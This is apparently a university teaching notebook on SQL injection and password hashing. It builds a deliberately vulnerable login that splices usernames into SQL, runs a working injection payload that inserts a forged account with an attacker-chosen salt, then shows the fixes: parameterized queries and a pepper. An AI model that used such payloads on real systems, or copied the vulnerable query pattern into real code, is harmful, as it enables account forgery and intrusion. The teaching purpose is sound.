# SQL Injection and Password Security

In this notebook, we show how, in a simple scenario, SQL injection can be used to forge user accounts for a website that does not offer registration for new users. The notebook uses some code from [this blog post](https://www.vitoshacademy.com/hashing-passwords-in-python/) on how to hash passwords in Python by Alessandro Molina.

Copyright Marcel Maltry & Jens Dittrich, [Big Data Analytics Group](https://bigdata.uni-saarland.de/), [CC-BY-SA](https://creativecommons.org/licenses/by-sa/4.0/legalcode)

# Setup

We start by defining two functions for hashing passwords and verifying given passwords against a hash.

`hash_password()` first generates a random `salt` string of 64 characters (the hex-encoded SHA-256 digest of 60 random bytes). We then compute the hash `pwdhash` of the provided password and salt using [`scrypt`](https://bitbucket.org/mhallin/py-scrypt/src/default/), a state-of-the-art, memory-hard password hashing function. We use a fresh random `salt` for every password so that identical passwords end up with different hash values: it is very unlikely that two hashes were computed with the same salt. Finally, `hash_password()` returns both `salt` and the password hash `pwdhash`, since a plain password can only be checked against `pwdhash` if we also know the `salt` that was used to compute it.
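To see why the random salt matters, here is a minimal sketch that hashes the same password under two fresh salts. It uses the standard library's `hashlib.scrypt` instead of the `scrypt` package so that it runs without extra dependencies, with `n=2**14, r=8, p=1, dklen=64`, which we assume mirror py-scrypt's defaults; `salted_hash` is a hypothetical helper name.

```python
import hashlib
import os

def salted_hash(password: str, salt: str) -> str:
    # Stand-in for scrypt.hash(password, salt); parameters assumed to match py-scrypt's defaults
    digest = hashlib.scrypt(password.encode(), salt=salt.encode(),
                            n=2**14, r=8, p=1, dklen=64)
    return digest.hex()

# Same recipe as hash_password(): SHA-256 of 60 random bytes, hex-encoded
salt_a = hashlib.sha256(os.urandom(60)).hexdigest()
salt_b = hashlib.sha256(os.urandom(60)).hexdigest()

hash_a = salted_hash('S0m3Stup1dP4ssw0rd?', salt_a)
hash_b = salted_hash('S0m3Stup1dP4ssw0rd?', salt_b)

print(len(salt_a))        # 64 hex characters
print(hash_a == hash_b)   # almost certainly False: same password, different salts
```

Hashing is still deterministic for a fixed salt, which is exactly why the salt has to be stored next to the hash.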

`verify_password()` takes the hashed password `pwdhash`, the `salt` used for hashing, and a plain text password `pwdcheck` that should be verified. It first computes the hash `pwdcheckhash` of the plain password and the salt and then compares it against `pwdhash`. If both match, we assume the password to be correct.
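The verification step can be sketched as follows. This variant swaps the plain `==` for the standard library's `hmac.compare_digest`, whose running time does not depend on where the two strings first differ, so the comparison leaks less timing information. It again assumes `hashlib.scrypt` as a stand-in for py-scrypt; `scrypt_hex` and `check_password` are hypothetical names.

```python
import hashlib
import hmac
import os

def scrypt_hex(password: str, salt: str) -> str:
    # Hex-encoded scrypt digest (stand-in for py-scrypt's scrypt.hash)
    return hashlib.scrypt(password.encode(), salt=salt.encode(),
                          n=2**14, r=8, p=1, dklen=64).hex()

def check_password(pwdhash: str, salt: str, pwdcheck: str) -> bool:
    # Recompute the hash of the candidate password with the stored salt ...
    pwdcheckhash = scrypt_hex(pwdcheck, salt)
    # ... and compare it with the stored hash in constant time
    return hmac.compare_digest(pwdcheckhash, pwdhash)

salt = hashlib.sha256(os.urandom(60)).hexdigest()
stored = scrypt_hex('S0m3Stup1dP4ssw0rd?', salt)
print(check_password(stored, salt, 'S0m3Stup1dP4ssw0rd?'))    # True
print(check_password(stored, salt, 'Bruteforcegeneratedpw'))  # False
```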

Below we provide implementations for both `hash_password()` and `verify_password()` along with a simple `unittest` to check whether the functions work as intended.

In [1]:
import hashlib, scrypt, binascii, os

def hash_password(password):
    # generate salt from 60 byte random string
    salt = hashlib.sha256(os.urandom(60)).hexdigest()
    
    # hash password, salt with scrypt and convert to ascii
    pwdhash = binascii.hexlify(scrypt.hash(password, salt)).decode()
    
    return pwdhash, salt

def verify_password(pwdhash, salt, pwdcheck):
    # hash pwdcheck, salt with scrypt and convert to ascii
    pwdcheckhash = binascii.hexlify(scrypt.hash(pwdcheck, salt)).decode()
    
    # compare pwdcheckhash with pwdhash
    return pwdcheckhash == pwdhash

In [2]:
import unittest

class TestPwHash(unittest.TestCase):

    def test_correct(self):
        pwd = 'S0m3Stup1dP4ssw0rd?'
        pwdhash, salt = hash_password(pwd)
        self.assertTrue(verify_password(pwdhash, salt, pwd))
       
        pwd = r'Y3tAn0th3rP4ssw0rd ¯\_(ツ)_/¯'
        pwdhash, salt = hash_password(pwd)
        self.assertTrue(verify_password(pwdhash, salt, pwd))

    def test_incorrect(self):
        pwd = 'S0m3Stup1dP4ssw0rd?'
        incorrectpw = 'Bruteforcegeneratedpw'
        pwdhash, salt = hash_password(pwd)
        self.assertFalse(verify_password(pwdhash, salt, incorrectpw))
        
        pwd = r'Y3tAn0th3rP4ssw0rd ¯\_(ツ)_/¯'
        incorrectpw = 'Brutforcing all day!'
        pwdhash, salt = hash_password(pwd)
        self.assertFalse(verify_password(pwdhash, salt, incorrectpw))
        
## Run the unit test without shutting down the jupyter kernel
unittest.main(argv=['ignored', '-v'], verbosity=2, exit=False)

test_correct (__main__.TestPwHash) ... ok
test_incorrect (__main__.TestPwHash) ... ok

----------------------------------------------------------------------
Ran 2 tests in 0.329s

OK



We then create a table for example user accounts with the following attributes:
* `id`: An automatically generated id of the user account,
* `username`: A unique username of the user account,
* `pwdhash`: The hash computed from the user-provided password and the salt,
* `salt`: The salt used for hashing the password.
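The column widths follow from the encodings used in `hash_password()`: assuming scrypt produces a 64-byte digest (py-scrypt's default output length, as far as we know), its hex encoding has 128 characters, and the SHA-256 hex digest used as salt has 64. A quick check, with the standard library's `hashlib.scrypt` as a stand-in:

```python
import binascii
import hashlib
import os

salt = hashlib.sha256(os.urandom(60)).hexdigest()
# 64-byte scrypt digest, hex-encoded the same way as in hash_password()
digest = hashlib.scrypt(b'ThisIsImmi', salt=salt.encode(), n=2**14, r=8, p=1, dklen=64)
pwdhash = binascii.hexlify(digest).decode()

print(len(pwdhash), len(salt))  # 128 64 -> fits char(128) and char(64)
```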

We populate the table with some example tuples.

**Note**: This notebook is meant to showcase the risk of *SQL injection* in a realistic setting. SQL injection is independent of how user credentials are stored (plain text, hashed, hashed and salted, ...).

In [3]:
import psycopg

dsn = 'dbname=postgres user=postgres host=/var/run/postgresql/'  # host may be /tmp/ on other systems

uname_pw = [('immanuel','ThisIsImmi'),
            ('joris', 'bestpwintheworld.'),
            ('kai', 'secretstr1ng'),
            ('felix', 'gueswaht?'),
            ('lukas', 'youll_never_know'),
            ('marcel', 's3cby0psc')]

def init_db(dsn):
    
    with psycopg.connect(dsn) as conn:
        
        # Open a cursor to perform database operations
        with conn.cursor() as cur:

            # Drop table if it exists
            cur.execute("DROP TABLE IF EXISTS users;")

            # Create users table
            cur.execute("""CREATE TABLE users
                          (id SERIAL PRIMARY KEY,
                           username varchar(42) UNIQUE,
                           pwdhash char(128),
                           salt char(64));""")

            # Insert sample data into users table
            cur.executemany("""INSERT INTO users(username, pwdhash, salt) VALUES (%s, %s, %s);""",
                            ((u, *hash_password(p)) for u, p in uname_pw))

conn = psycopg.connect(dsn)
conn.autocommit = True

init_db(dsn)

# Insecure Login

We first implement an insecure login routine `insec_login()` that does not sanitize the user-provided input. First, it sends a query to the database that retrieves `pwdhash` and `salt` for the provided username. If there is no matching record, the user does not exist and a `UserNotFoundException` is raised. Otherwise, it verifies that the provided password is correct. If so, it returns `True`; otherwise, username and password do not match and a `UserAndPasswordMismatchException` is raised.

Note that the query sent to the database to request `pwdhash` and `salt` is created by blindly inserting the user-provided username into a string query template. It is therefore vulnerable to SQL injection, as shown next.
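The problem can be reproduced without a database. In the sketch below, `build_query` is a hypothetical helper that mirrors the f-string in `insec_login()`; a single quote in the input ends the string literal early, and everything after it is read as SQL. The `DROP TABLE` payload is only an illustration.

```python
def build_query(username: str) -> str:
    # Same template as in insec_login(): user input is spliced in verbatim
    return f"SELECT pwdhash, salt FROM users WHERE username='{username}';"

print(build_query("joris"))
# SELECT pwdhash, salt FROM users WHERE username='joris';

payload = "'; DROP TABLE users; --"
print(build_query(payload))
# SELECT pwdhash, salt FROM users WHERE username=''; DROP TABLE users; --';
```

The leftover `';` from the template ends up behind `--` and is therefore ignored as a comment.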

In [4]:
class UserNotFoundException(Exception):
    """User was not found in database."""
    pass

class UserAndPasswordMismatchException(Exception):
    """User and password do not match."""
    pass

def insec_login(username, password, debug=False, verbose=True):
    # open cursor to perform db operation
    cur = conn.cursor()
    
    # retrieve pwdhash and salt from db
    # the following line with a string concat is the problem
    # this enables SQL injection:
    sql_query = f"SELECT pwdhash, salt FROM users WHERE username=\'{username}\';" 
    if verbose:
        print(f"We constructed the following SQL-query:\n{sql_query}")
    cur.execute(sql_query)
    if debug:
        print(cur.query)
    if cur.rowcount < 1:
        raise UserNotFoundException
    (pwdhash, salt) = cur.fetchone()
    if verbose:
        print(f"The SQL-query retrieved:\npwdhash:{pwdhash}\nsalt:{salt}")
    cur.close()
    
    # check pwd
    if not verify_password(pwdhash, salt, password):
        raise UserAndPasswordMismatchException
    
    # login successful
    return True

We can log in if we provide a username and password that are present in the database.

In [5]:
# successful login
print(f"Login successful: {insec_login('joris', 'bestpwintheworld.')}")

We constructed the following SQL-query:
SELECT pwdhash, salt FROM users WHERE username='joris';
The SQL-query retrieved:
pwdhash:0c569a501423d0a89c905ba4e26d2c6ebe31ae39e375c362c9fd4fd4ec290eed26532428673f0acd53362ca47f685f37fa01ed42dc995e852a1cbeed758a9b0f
salt:25d27fe1af545e96f6986567915672b6105f448fc3d31bc9bc69f37b5bbef4be
Login successful: True


Next, we want to show that `insec_login()` is vulnerable to SQL injection.

Assume that we are an attacker who wants to get access to the system but does not have a user account. Further assume that accounts can only be created by the database administrator. We can exploit the fact that the insecure login inserts our input into the query without sanitizing it. Our exploit works in three steps:
1. We choose a username and plain text password with which we want to be able to log in later.
2. We choose a salt and hash our plain text password with it.
3. We compose a string that, when provided as username, makes the database create a user account for us.

The last step consists of three parts:
1. We close the quotes in which the login routine inserts the username and terminate the query (`';`). This will cause the login attempt to fail, but for now we only care about creating a user account.
2. We append an `INSERT` statement that adds our user account with `username`, `pwdhash`, and `salt` to the database (`INSERT INTO users(username, pwdhash, salt) VALUES ...`).
3. We do not know how the query template ends, so we comment out whatever follows (`--`) to keep the query syntactically correct.

In the end, we print the `evil_string` that should be provided as username on login.

In [6]:
# Choose attacker's username and password
evil_username = 'student'
evil_password = 'evil_pwd'

def build_evil_string(evil_username, evil_password):

    # Compute attacker's pwdhash and salt
    evil_salt = '0'*64
    evil_pwdhash = binascii.hexlify(scrypt.hash(evil_password, evil_salt)).decode()

    # Build sql injection string
    evil_string = f"\'; "\
                  f"INSERT INTO users(username, pwdhash, salt) VALUES"\
                  f"(\'{evil_username}\', \'{evil_pwdhash}\', \'{evil_salt}\');"\
                  f" --"
    
    return evil_string


evil_string = build_evil_string(evil_username, evil_password)
print(f"Insert this as username on login:\n{evil_string}")

Insert this as username on login:
'; INSERT INTO users(username, pwdhash, salt) VALUES('student', 'ce65df4add0866ebef7969a3522734dad70730244e78d0c01b4d5018b6de417d42c8a9b1e3fdf994f5e983fd7fd35bd3c6fa4b771e51fe0b697023b8a6a93047', '0000000000000000000000000000000000000000000000000000000000000000'); --


The next cell asks us for a username and password and then tries to log in with whatever we provide. If we provide the `evil_string` as username and anything as password, the login fails, but a user account with the credentials from above is created.
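The effect of this cell can also be reproduced without a PostgreSQL server. The sketch below is a stand-in, not the notebook's setup: it uses Python's built-in `sqlite3` module with an in-memory database. Because `sqlite3`'s `execute()` refuses to run more than one statement, the vulnerable lookup uses `executescript()`, which runs a semicolon-separated script and discards any result rows, so the sketch only shows the side effect. `insecure_lookup` and the placeholder hash values are hypothetical.

```python
import sqlite3

conn = sqlite3.connect(':memory:')
conn.execute("""CREATE TABLE users (
                    id INTEGER PRIMARY KEY AUTOINCREMENT,
                    username TEXT UNIQUE,
                    pwdhash TEXT,
                    salt TEXT)""")
conn.execute("INSERT INTO users(username, pwdhash, salt) VALUES ('joris', 'h1', 's1')")

def insecure_lookup(username):
    # User input is spliced into the SQL text; executescript() runs every statement in it
    conn.executescript(f"SELECT pwdhash, salt FROM users WHERE username='{username}';")

# Attacker-controlled "username" with a placeholder hash and an all-zero salt
evil = ("'; INSERT INTO users(username, pwdhash, salt) "
        "VALUES ('student', 'fakehash', '" + '0' * 64 + "'); --")
insecure_lookup(evil)

print(conn.execute("SELECT username FROM users ORDER BY id").fetchall())
# [('joris',), ('student',)]
```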

In [7]:
username = input("Username:")
password = input("Password:")

try:
    insec_login(username, password)
except Exception:
    print("Error occurred during login.")

Username:'; INSERT INTO users(username, pwdhash, salt) VALUES('student', 'ce65df4add0866ebef7969a3522734dad70730244e78d0c01b4d5018b6de417d42c8a9b1e3fdf994f5e983fd7fd35bd3c6fa4b771e51fe0b697023b8a6a93047', '0000000000000000000000000000000000000000000000000000000000000000'); --
Password:test
We constructed the following SQL-query:
SELECT pwdhash, salt FROM users WHERE username=''; INSERT INTO users(username, pwdhash, salt) VALUES('student', 'ce65df4add0866ebef7969a3522734dad70730244e78d0c01b4d5018b6de417d42c8a9b1e3fdf994f5e983fd7fd35bd3c6fa4b771e51fe0b697023b8a6a93047', '0000000000000000000000000000000000000000000000000000000000000000'); --';
Error occurred during login.


We are now able to log in with the forged account from above.

In [8]:
print(f"Login successful: {insec_login(evil_username, evil_password)}")

We constructed the following SQL-query:
SELECT pwdhash, salt FROM users WHERE username='student';
The SQL-query retrieved:
pwdhash:ce65df4add0866ebef7969a3522734dad70730244e78d0c01b4d5018b6de417d42c8a9b1e3fdf994f5e983fd7fd35bd3c6fa4b771e51fe0b697023b8a6a93047
salt:0000000000000000000000000000000000000000000000000000000000000000
Login successful: True


# Preventing the Attack

There are two ways to prevent this specific attack: we can define a more secure login function that uses prepared statements (parameterized queries), or we can add a server-side secret to the password hashing process ([salt+pepper](https://security.stackexchange.com/a/3289)). Note that only the first prevents the SQL injection itself; the pepper merely makes an injected account unusable. We showcase both solutions in the following. Ideally, we implement both.


## Secure Login with Prepared Statement

In the login procedure above, the attacker exploits the fact that the parameter `username` is never checked. The system simply assumes that it is a valid username and pastes it into the SQL query template. The attack can be avoided if we make sure that the database interprets the entire `username` as a string value, i.e., if we separate the SQL code from the input data.
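The idea can be sketched with the standard library's `sqlite3` module as a stand-in for PostgreSQL (`sqlite3` uses `?` placeholders where psycopg uses `%s`). The query text and the value are passed separately, so the evil string is compared as one literal username and no `INSERT` runs. `secure_lookup` and the sample values are hypothetical.

```python
import sqlite3

conn = sqlite3.connect(':memory:')
conn.execute("CREATE TABLE users (username TEXT UNIQUE, pwdhash TEXT, salt TEXT)")
conn.execute("INSERT INTO users VALUES (?, ?, ?)", ('immanuel', 'h1', 's1'))

def secure_lookup(username):
    # The ? placeholder binds username as a value; it is never parsed as SQL
    return conn.execute(
        "SELECT pwdhash, salt FROM users WHERE username = ?", (username,)
    ).fetchall()

evil = "'; INSERT INTO users VALUES ('student2', 'fakehash', '0'); --"
print(secure_lookup('immanuel'))  # [('h1', 's1')]
print(secure_lookup(evil))        # [] (no user has that literal name)
print(conn.execute("SELECT COUNT(*) FROM users").fetchone()[0])  # 1
```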

Prepared statements are explained in more detail in the [SQL Injection](https://github.com/BigDataAnalyticsGroup/bigdataengineering/blob/master/SQL%20Injection.ipynb) notebook.

Below, we define a secure login procedure using a prepared statement.

In [9]:
def sec_login(uname, pwd, debug=False):
    # open cursor to perform db operation; it is closed automatically, even on errors
    with conn.cursor() as cur:
        # retrieve pwdhash and salt from db with a parameterized query:
        # uname is sent separately from the SQL text and never parsed as SQL
        cur.execute("SELECT pwdhash, salt FROM users WHERE username=%s;", (uname,))
        if debug:
            print(cur.query)
        if cur.rowcount < 1:
            raise UserNotFoundException
        (pwdhash, salt) = cur.fetchone()
    
    # check pwd
    if not verify_password(pwdhash, salt, pwd):
        raise UserAndPasswordMismatchException
    
    # login successful
    return True

Existing users can still log in without any problem.

In [10]:
# Successful login
try:
    print(f"Login successful: {sec_login('immanuel', 'ThisIsImmi')}")
except Exception:
    print("It did not work.")

Login successful: True


We can now try the same attack from above with a new username.

In [11]:
evil_username = 'student2'
evil_password = 'who needs security, right?'

evil_string = build_evil_string(evil_username, evil_password)
print(f"Insert this as username on login:\n{evil_string}")

Insert this as username on login:
'; INSERT INTO users(username, pwdhash, salt) VALUES('student2', '59d5f8185ff7ebb328afdaa4a57861a8bcd3b42a01fd1b493b535bf3467dcb8aabffc63f427abf9c5ce87bcc2518d34facd192e9340173c0e5f96638bc8156b0', '0000000000000000000000000000000000000000000000000000000000000000'); --


In [12]:
uname = input("Username:")
pwd = input("Password:")

try:
    sec_login(uname, pwd)
except Exception:
    print("Error occurred during login.")   

Username:'; INSERT INTO users(username, pwdhash, salt) VALUES('student2', '59d5f8185ff7ebb328afdaa4a57861a8bcd3b42a01fd1b493b535bf3467dcb8aabffc63f427abf9c5ce87bcc2518d34facd192e9340173c0e5f96638bc8156b0', '0000000000000000000000000000000000000000000000000000000000000000'); --
Password:test
Error occurred during login.


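Since the user input was properly separated from the SQL code, the database looked for a user whose name is the entire evil string; the `INSERT` part was never executed and, thus, no new user account was created. Therefore, logging in with the attacker's credentials fails.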

In [13]:
try:
    print(f"Login successful: {sec_login(evil_username, evil_password)}")
except Exception:
    print("It did not work.")

It did not work.


## Hashing Passwords with Salt and Pepper

The attack from above works because we are able to insert our own salt into the database and, thus, when checking for the correctness of a password during login, the system uses our salt to compute the hash that is compared against the one we inserted into the database.

The attack can be avoided by adding a secret that is known only to the server, called a *pepper*. Instead of computing the hash like

```python
scrypt.hash(password, salt)
```

we introduce a secret string `pepper` that is used for computing the hash like

```python
scrypt.hash(password, salt+pepper)
```

The secret string `pepper` is known only to the server. This implies that when using the insecure login procedure, we are still able to insert new user accounts into the database. However, since we do not know the secret `pepper`, the hash we compute and insert will not match the hash that the server computes when verifying the user-provided password upon logging in.
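A minimal sketch of the pepper idea, again using `hashlib.scrypt` as a stand-in for py-scrypt. `PEPPER`, `peppered_hash`, and `verify` are hypothetical names. For the demo, the pepper is generated with `secrets.token_hex`; a real server would instead load a fixed pepper from configuration kept outside the database, since otherwise stored hashes become unverifiable after a restart. The attacker forges a row the same way `build_evil_string()` does, with an all-zero salt and no pepper, and that row never verifies.

```python
import hashlib
import hmac
import os
import secrets

# Hypothetical server-side secret; never stored in the users table
PEPPER = secrets.token_hex(32)

def peppered_hash(password: str, salt: str, pepper: str = PEPPER) -> str:
    # Corresponds to scrypt.hash(password, salt+pepper), hex-encoded
    return hashlib.scrypt(password.encode(), salt=(salt + pepper).encode(),
                          n=2**14, r=8, p=1, dklen=64).hex()

def verify(pwdhash: str, salt: str, pwdcheck: str) -> bool:
    # The server always re-hashes with salt+PEPPER
    return hmac.compare_digest(peppered_hash(pwdcheck, salt), pwdhash)

# Legitimate account created by the server (knows the pepper)
salt = hashlib.sha256(os.urandom(60)).hexdigest()
stored = peppered_hash('ThisIsImmi', salt)

# Forged account injected by the attacker, hashed without the pepper
evil_salt = '0' * 64
evil_hash = peppered_hash('evil_pwd', evil_salt, pepper='')

print(verify(stored, salt, 'ThisIsImmi'))        # True
print(verify(evil_hash, evil_salt, 'evil_pwd'))  # False
```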